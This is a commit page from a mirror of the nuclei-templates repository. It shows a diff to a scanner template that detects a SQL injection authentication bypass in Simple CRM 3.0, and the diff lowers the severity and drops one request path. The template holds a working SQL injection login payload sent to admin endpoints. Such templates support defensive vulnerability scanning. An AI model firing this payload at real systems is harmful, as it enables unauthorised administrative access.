daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update simple-crm-sql-injection.yaml

patch-1
Prince Chaddha 2021-08-16 14:06:18 +05:30 committed by GitHub
parent bd865a0615
commit 2875be2d82
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
vulnerabilities/simplecrm/simple-crm-sql-injection.yaml
View File

@ -3,7 +3,7 @@ id: simple-crm-sql-injection
info: info:
name: Simple CRM 3.0 - 'email' SQL injection & Authentication Bypass name: Simple CRM 3.0 - 'email' SQL injection & Authentication Bypass
author: geeknik author: geeknik
severity: critical severity: high
reference: https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt reference: https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt
tags: sqli,simplecrm,auth-bypass tags: sqli,simplecrm,auth-bypass
@ -13,20 +13,17 @@ requests:
- "{{BaseURL}}/scrm/crm/admin" - "{{BaseURL}}/scrm/crm/admin"
body: "email='+or+2>1+--+&password=&login=" body: "email='+or+2>1+--+&password=&login="
- method: POST
path:
- "{{BaseURL}}/crm/admin"
body: "email='+or+2>1+--+&password=&login="
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status
status: status:
- 200 - 200
- type: word - type: word
words: words:
- "<script>window.location.href='home.php'</script>" - "<script>window.location.href='home.php'</script>"
part: body part: body
- type: word - type: word
words: words:
- "text/html" - "text/html"